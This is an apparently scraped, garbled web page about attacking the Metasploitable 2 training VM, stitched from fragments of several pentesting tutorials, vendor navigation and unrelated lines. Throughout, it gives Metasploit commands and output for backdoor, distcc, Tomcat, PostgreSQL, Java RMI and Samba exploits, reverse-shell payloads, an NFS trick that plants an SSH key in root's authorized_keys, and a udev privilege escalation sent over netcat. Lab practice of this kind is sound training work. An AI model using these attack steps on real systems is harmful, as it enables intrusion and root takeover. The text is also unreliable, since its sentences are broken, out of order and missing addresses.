metasploitable 2 list of vulnerabilities

Display the contents of the newly created file. Part 2 - Network Scanning. Exploits include buffer overflow, code injection, and web application exploits. When we try to netcatto a port, we will see this: (UNKNOWN) [] 514 (shell) open. Id Name Attackers can implement arbitrary commands by defining a username that includes shell metacharacters. RPORT 3632 yes The target port RHOST yes The target address msf auxiliary(smb_version) > set RHOSTS Its GUI has three distinct areas: Targets, Console, and Modules. The interface looks like a Linux command-line shell. Nessus, OpenVAS and Nexpose VS Metasploitable. LHOST => Name Current Setting Required Description [*] Command: echo qcHh6jsH8rZghWdi; USERNAME no The username to authenticate as This set of articles discusses the RED TEAM's tools and routes of attack. For the final challenge you'll be conducting a short and simple vulnerability assessment of the Metasploitable 2 system, by launching your own vulnerability scans using Nessus, and reporting on the vulnerabilities and flaws that are discovered. Payload options (cmd/unix/reverse): 0 Automatic LHOST yes The listen address Proxies no Use a proxy chain Metasploitable 2 is designed to be vulnerable in order to work as a sandbox to learn security. The nmap scan shows that the port is open but tcpwrapped. Exploiting Samba Vulnerability on Metasploit 2 The screenshot below shows the results of running an Nmap scan on Metasploitable 2. Inject the XSS on the register.php page.XSS via the username field, Parameter pollutionGET for POSTXSS via the choice parameterCross site request forgery to force user choice. msf exploit(tomcat_mgr_deploy) > show option RHOST => Both operating systems were a Virtual Machine (VM) running under VirtualBox. Name Current Setting Required Description msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat However, the exact version of Samba that is running on those ports is unknown. Working with the Vulnerability Validation Wizard, Validating Vulnerabilities Discovered by Nexpose, Social Engineering Campaign Details Report, Single Password Testing MetaModule Report, Understanding the Credentials Domino MetaModule Findings, Segmentation and Firewall Testing MetaModule, Managing the Database from the Pro Console, Metasploit service can"t bind to port 3790, Items Displaying Incorrectly After Update, Installation failed: Signature failure Error, Use Meterpreter Locally Without an Exploit, Issue Restarting on Windows Due to RangeError, Social Engineering Campaigns Report Image Broken, Social Engineering Campaign Taking a Long Time, Downloading and Setting Up Metasploitable 2, Identifying Metasploitable 2's IP Address,, Distccd is the server of the distributed compiler for distcc. It allows hackers to set up listeners that create a conducive environment (referred to as a Meterpreter) to manipulate compromised machines. [*] Writing to socket A RHOST yes The target address root@ubuntu:~# mount -t nfs /tmp/r00t/, root@ubuntu:~# cat ~/.ssh/ >> /tmp/r00t/root/.ssh/authorized_keys, Last login: Fri Jun 1 00:29:33 2012 from, root@ubuntu:~# telnet 6200, msf > use exploit/unix/irc/unreal_ircd_3281_backdoor, msf exploit(unreal_ircd_3281_backdoor) > set RHOST, msf exploit(unreal_ircd_3281_backdoor) > exploit. Here are the outcomes. msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat By Ed Moyle, Drake Software Nowhere is the adage "seeing is believing" more true than in cybersecurity. A test environment provides a secure place to perform penetration testing and security research. cmd/unix/interact normal Unix Command, Interact with Established Connection The risk of the host failing or to become infected is intensely high. Using the UPDATE pg_largeobject binary injection method, this module compiles a Linux shared object file, uploads it to your target host, and generates a UDF (user-defined function) by that shared object. [*] Writing exploit executable (1879 bytes) to /tmp/DQDnKUFLzR LHOST => This document will continue to expand over time as many of the less obvious flaws with this platform are detailed. msf exploit(unreal_ircd_3281_backdoor) > show options [*] B: "ZeiYbclsufvu4LGM\r\n" [*] A is input Currently missing is documentation on the web server and web application flaws as well as vulnerabilities that allow a local user to escalate to root privileges. So we got a low-privilege account. [*] Writing to socket B RHOSTS yes The target address range or CIDR identifier 0 Automatic Target PASSWORD no The Password for the specified username [*] Reading from socket B The following sections describe the requirements and instructions for setting up a vulnerable target. This must be an address on the local machine or msf auxiliary(telnet_version) > run The compressed file is about 800 MB and can take a while to download over a slow connection. Step 3: Set the memory size to 512 MB, which is adequate for Metasploitable2. Need to report an Escalation or a Breach? Execute Metasploit framework by typing msfconsole on the Kali prompt: Search all . What is Metasploit This is a tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems. RHOST yes The target address Step 7: Bootup the Metasploitable2 machine and login using the default user name and Password: In this tutorial, we will walk through numerous ways to exploit Metasploitable 2, the popular vulnerable machine from Rapid7. Description. Server version: 5.0.51a-3ubuntu5 (Ubuntu). Our Pentesting Lab will consist of Kali Linux as the attacker and Metasploitable 2 as the target. msf auxiliary(smb_version) > run It is also instrumental in Intrusion Detection System signature development. Step 6: Display Database Name. Metasploit Discover target information, find vulnerabilities, attack and validate weaknesses, and collect evidence. On Metasploitable 2, there are many other vulnerabilities open to exploit. Name Current Setting Required Description The vulnerability being demonstrated here is how a backdoor was incorporated into the source code of a commonly used package, namely vsftp. [*] A is input The web server starts automatically when Metasploitable 2 is booted. Id Name From our attack system (Linux, preferably something like Kali Linux), we will identify the open network services on this virtual machine using the Nmap Security Scanner. The next service we should look at is the Network File System (NFS). msf exploit(distcc_exec) > exploit Find what else is out there and learn how it can be exploited. RPORT => 8180 Matching Modules [*] A is input S /tmp/run Login with the above credentials. ---- --------------- -------- ----------- THREADS 1 yes The number of concurrent threads The list is organized in an interactive table (spreadsheet) with the most important information about each module in one row, namely: Exploit module name with a brief description of the exploit List of platforms and CVEs (if specified in the module) now i just started learning about penetration testing, unfortunately now i am facing a problem, i just installed GVM / OpenVas version 21.4.1 on a vm with kali linux 2020.4 installed, and in the other vm i have metasploitable2 installed both vm network are set with bridged, so they can ping each other because they are on the same network. The payload is uploaded using a PUT request as a WAR archive comprising a jsp application. Depending on the order in which guest operating systems are started, the IP address of Metasploitable 2 will vary. USER_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_user.txt no File containing users, one per line Before we perform further enumeration, let us see whether these credentials we acquired can help us in gaining access to the remote system. Metasploitable Databases: Exploiting MySQL with Metasploit: Metasploitable/MySQL Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres Metasploitable Networking: RHOST yes The target address Exploit target: msf auxiliary(postgres_login) > run [*] Reading from socket B This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms. Enter file in which to save the key (/root/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Your identification has been saved in /root/.ssh/id_rsa. Set Version: Ubuntu, and to continue, click the Next button. Id Name Lets begin by pulling up the Mutillidae homepage: Notice that the Security Level is set to 0, Hints is also set to 0, and that the user is not Logged In. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. [*] Postgres - Disconnected DVWA is PHP-based using a MySQL database and is accessible using admin/password as login credentials. -- ---- . After you log in to Metasploitable 2, you can identify the IP address that has been assigned to the virtual machine. Please check out the Pentesting Lab section within our Part 1 article for further details on the setup. RPORT 80 yes The target port THREADS 1 yes The number of concurrent threads The default login and password is msfadmin:msfadmin. Name Current Setting Required Description Payload options (java/meterpreter/reverse_tcp): 0 Automatic So all we have to do is use the remote shell program to log in: Last login: Wed May 7 11:00:37 EDT 2021 from :0.0 on pts/0, Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686. To make this step easier, both Nessus and Rapid7 NexPose scanners are used locate potential vulnerabilities for each service. Target the IP address you found previously, and scan all ports (0-65535). Additionally, an ill-advised PHP information disclosure page can be found at http:///phpinfo.php. msf exploit(java_rmi_server) > exploit Have you used Metasploitable to practice Penetration Testing? The major purpose why use of such virtual machines is done could be for conducting security trainings, testing of security tools, or simply for practicing the commonly known techniques of penetration testing. According to the most recent available information, this backdoor was added to the vsftpd-2.3.4.tar.gz archive between June 30, 2011, and July 1, 2011. msf > use exploit/multi/misc/java_rmi_server msf exploit(postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp msf exploit(java_rmi_server) > show options What is Metasploit This is a tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems. The Nessus scan showed that the password password is used by the server. Name Current Setting Required Description We can see a few insecure web applications by navigating to the web server root, along with the msfadmin account information that we got earlier via telnet. whoami We can't check every single IP out there for vulnerabilities so we buy (or download) scanners and have them do the job for us. [*] Command: echo VhuwDGXAoBmUMNcg; ---- --------------- -------- ----------- 15. df8cc200 15 2767 00000001 0 0 00000000 2, ps aux | grep udev Were 64 bit Kali, the target is 32 bit, so we compile it specifically for 32 bit: From the victim, we go to the /tmp/ directory and take the exploit from the attacking machine: Confirm that this is the right PID by looking at the udev service: It seems that it is the right one (2768-1 = 2767). Lets first see what relevant information we can obtain using the Tomcat Administration Tool Default Access module: With credentials, we are now able to use the Apache Tomcat Manager Application Deployer Authenticated Code Execution exploit: You may use this module to execute a payload on Apache Tomcat servers that have a manager application that is exposed. payload => cmd/unix/reverse Exploit target: Much less subtle is the old standby "ingreslock" backdoor that is listening on port 1524. Type help; or \h for help. Step 3: Always True Scenario. [*] Accepted the first client connection -- ---- 0 Generic (Java Payload) The easiest way to get a target machine is to use Metasploitable 2, which is an intentionally vulnerable Ubuntu Linux virtual machine that is designed for testing common vulnerabilities. A Computer Science portal for geeks. Need to report an Escalation or a Breach? This is the action page. Id Name Metasploitable 2 offers the researcher several opportunities to use the Metasploit framework to practice penetration testing. : CVE-2009-1234 or 2010-1234 or 20101234) For more information on Metasploitable 2, check out this handy guide written by HD Moore. msf exploit(twiki_history) > exploit Metasploit has a module to exploit this in order to gain an interactive shell, as shown below. In the online forums some people think this issue is due to a problem with Metasploit 6 whilst Metasploit 5 does not have this issue. Since this is a mock exercise, I leave out the pre-engagement, post-exploitation and risk analysis, and reporting phases. 0 Automatic RHOST => For network clients, it acknowledges and runs compilation tasks. The nmap command uses a few flags to conduct the initial scan. 17,011. [*] Sending backdoor command You can edit any TWiki page. . [*] Command: echo 7Kx3j4QvoI7LOU5z; This version contains a backdoor that went unnoticed for months - triggered by sending the letters "AB" following by a system command to the server on any listening port. ---- --------------- -------- ----------- It gives you everything you need from scanners to third-party integrations that you will need throughout an entire penetration testing lifecycle. msf exploit(postgres_payload) > set LHOST msf auxiliary(tomcat_administration) > show options RPORT 8180 yes The target port So, as before with MySQL, it is possible to log into this database, but we have checked for the available exploits of Metasploit and discovered one which can further the exploitation: The Postgresaccount may write to the /tmp directory onsome standard Linux installations of PostgreSQL and source the UDF Shared Libraries om there, enabling arbitrary code execution. To build a new virtual machine, open VirtualBox and click the New button. RPORT 1099 yes The target port To begin using the Metasploit interface, open the Kali Linux terminal and type msfconsole. SMBUser no The username to authenticate as 865.1 MB. The -Pn flag prevents host discovery pings and just assumes the host is up. [+] Postgres - Logged in to 'template1' with 'postgres':'postgres' msf auxiliary(smb_version) > show options Setting the Security Level from 0 (completely insecure) through to 5 (secure). individual files in /usr/share/doc/*/copyright. In our testing environment, the IP of the attacking machine is, and the victim machine is Id Name Pass the udevd netlink socket PID (listed in /proc/net/netlink, typically is the udevd PID minus 1) as argv[1]. NOTE: Compatible payload sets differ on the basis of the target selected. Metasploitable 2 has deliberately vulnerable web applications pre-installed. Name Disclosure Date Rank Description We looked for netcat on the victims command line, and luckily, it is installed: So well compile and send the exploit via netcat. Module options (exploit/linux/postgres/postgres_payload): Tip How to use Metasploit commands and exploits for pen tests These step-by-step instructions demonstrate how to use the Metasploit Framework for enterprise vulnerability and penetration testing. msf auxiliary(telnet_version) > show options TCP ports 512, 513, and 514 are known as "r" services, and have been misconfigured to allow remote access from any host (a standard ".rhosts + +" situation). Metasploitable 3 is a build-it-on-your-own-system operating system. In this example, Metasploitable 2 is running at IP RHOST yes The target address msf exploit(vsftpd_234_backdoor) > show options 0 Linux x86 [*] Accepted the first client connection The Nessus scan exposed the vulnerability of the TWiki web application to remote code execution. Step 2: Basic Injection. RPORT 5432 yes The target port This can be done via brute forcing, SQL injection and XSS via referer HTTP headerSQL injection and XSS via user-agent string, Authentication bypass SQL injection via the username field and password fieldSQL injection via the username field and password fieldXSS via username fieldJavaScript validation bypass, This page gives away the PHP server configurationApplication path disclosurePlatform path disclosure, Creates cookies but does not make them HTML only. The login for Metasploitable 2 is msfadmin:msfadmin. ---- --------------- ---- ----------- SQLi and XSS on the log are possibleGET for POST is possible because only reading POSTed variables is not enforced. Setting 3 levels of hints from 0 (no hints) to 3 (maximum hints). This is an issue many in infosec have to deal with all the time. Start/Stop Stop: Open services.msc. Additionally three levels of hints are provided ranging from "Level 0 - I try harder" (no hints) to "Level 2 - noob" (Maximum hints). Metasploitable3 is a VM that is built from the ground up with a large amount of security vulnerabilities. The easiest way to get a target machine is to use Metasploitable 2, which is an intentionally vulnerable Ubuntu Linux virtual machine that is designed for testing common vulnerabilities. RHOST yes The target address Working with the Vulnerability Validation Wizard, Validating Vulnerabilities Discovered by Nexpose, Social Engineering Campaign Details Report, Single Password Testing MetaModule Report, Understanding the Credentials Domino MetaModule Findings, Segmentation and Firewall Testing MetaModule, Managing the Database from the Pro Console, Metasploit service can"t bind to port 3790, Items Displaying Incorrectly After Update, Installation failed: Signature failure Error, Use Meterpreter Locally Without an Exploit, Issue Restarting on Windows Due to RangeError, Social Engineering Campaigns Report Image Broken, Social Engineering Campaign Taking a Long Time, eth0 Link encap:Ethernet HWaddr 00:0c:29:9a:52:c1, inet addr: Bcast: Mask:, inet6 addr: fe80::20c:29ff:fe9a:52c1/64 Scope:Link, UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1, root@ubuntu:~# nmap -p0-65535, Starting Nmap 5.61TEST4 ( ) at 2012-05-31 21:14 PDT, Last login: Fri Jun 1 00:10:39 EDT 2012 from :0.0 on pts/0, Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686, root@ubuntu:~# showmount -e ---- --------------- -------- ----------- [*] Reading from socket B First lets start MSF so that it can initialize: By searching the Rapid7 Vulnerability & Exploit Database we managed to locate the following TWiki vulnerability: Alternatively the command search can be used at the MSF Console prompt. THREADS 1 yes The number of concurrent threads set PASSWORD postgres [*] Accepted the second client connection Metasploitable 2 VM is an ideal virtual machine for computer security training, but it is not recommended as a base system. Id Name [*] Matching Application Security AppSpider Test your web applications with our on-premises Dynamic Application Security Testing (DAST) solution. root, msf > use auxiliary/admin/http/tomcat_administration [*] Reading from socket B Oracle is a registered trademark of Oracle Corporation and/or its, affiliates. The SwapX project on BNB Chain suffered a hacking attack on February 27, 2023. This tutorial shows how to install it in Ubuntu Linux, how it works, and what you can do with this powerful security auditing tool. This could allow more attacks against the database to be launched by an attacker. tomcat55, msf > use exploit/linux/misc/drb_remote_codeexec msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat Same as credits.php. [*] Using URL: msf > use exploit/unix/misc/distcc_exec This is Bypassing Authentication via SQL Injection. By default, msfconsole opens up with a banner; to remove that and start the interface in quiet mode, use the msfconsole command with the -q flag. The vulnerability present in samba 3.x - 4.x has several vulnerabilities that can be exploited by using Metasploit module metasploit module: exploit/multi/samba/usermap_script set RHOST- your Remote machine IP then exploit finally you got a root access of remote machine. [*] Executing /RuoE02Uo7DeSsaVp7nmb79cq/19CS3RJj.jsp Name Current Setting Required Description Metasploitable 3 is the updated version based on Windows Server 2008. The following command line will scan all TCP ports on the Metasploitable 2 instance: Nearly every one of these listening services provides a remote entry point into the system. RHOST => The CVE List is built by CVE Numbering Authorities (CNAs). Step 9: Display all the columns fields in the . Module options (exploit/unix/irc/unreal_ircd_3281_backdoor): USERNAME => tomcat High-end tools like Metasploit and Nmap can be used to test this application by security enthusiasts. VHOST no HTTP server virtual host Lets see if we can really connect without a password to the database as root. 192.168.56/24 is the default "host only" network in Virtual Box. [*] A is input Exploit target: Pentesting Vulnerabilities in Metasploitable (part 2), VM version = Metasploitable 2, Ubuntu 64-bit. Rapid7 Metasploit Pro installers prior to version 4.13.0-2017022101 contain a DLL preloading vulnerability, wherein it is possible for the installer to load a malicious DLL located in the current working directory of the installer. METASPLOIT On-Prem Vulnerability Management NEXPOSE Digital Forensics and Incident Response (DFIR) Velociraptor Cloud Risk Complete Cloud Security with Unlimited Vulnerability Management Explore Offer Managed Threat Complete MDR with Unlimited Risk Coverage Explore offer Services MANAGED SERVICES Detection and Response [*] Writing to socket A msf exploit(vsftpd_234_backdoor) > show options Then, hit the "Run Scan" button in the . RHOSTS => Before running it, you need to download the pre-calculated vulnerable keys from the following links: (RSA keys), (DSA keys), ruby ./5632.rb root ~/rsa/2048/. ---- --------------- -------- ----------- SESSION => 1 For this, Metasploit has an exploit available: A documented security flaw is used by this module to implement arbitrary commands on any system operating distccd. Description: In this video I will show you how to exploit remote vulnerabilities on Metasploitable -2 . Metasploitable 2 is a straight-up download. With the udev exploit, We'll exploit the very same vulnerability, but from inside Metasploit this time: PASSWORD => tomcat It is inherently vulnerable since it distributes data in plain text, leaving many security holes open. Step 6: On the left menu, click the Network button and change your network adapter settings as follows: Advanced Select: Promiscuous Mode as Allow All Attached, Network Setting: Enable Network Adapter and select Ethernet or Wireless. Module options (exploit/multi/http/tomcat_mgr_deploy): [*] Accepted the first client connection Pentesting Vulnerabilities in Metasploitable (part 1), How To install NetHunter Rootless Edition, TWiki History TWikiUsers rev Parameter Command Execution, PHPIDS (PHP-Intrusion Detection System enable/disable). Proxies no Use a proxy chain STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host [*] chmod'ing and running it In Metasploitable that can be done in two ways, first, you can quickly run the ifconfig command in the terminal and find the IP address of the machine or you can run a Nmap scan in Kali. Threads 1 yes the number of concurrent THREADS the default `` host only '' network in virtual.... From 0 ( no hints ) to manipulate compromised machines: Display all columns! Ground up with a large amount of security vulnerabilities the number of concurrent THREADS the default `` host only network... And type msfconsole ( referred to as a WAR archive comprising a jsp application Display all columns! Is a mock exercise, I leave out the Pentesting Lab will consist of Kali Linux as the and. Code injection, and collect evidence Description: in this video I will you! Step 3: set the memory size to 512 MB, which is adequate Metasploitable2! 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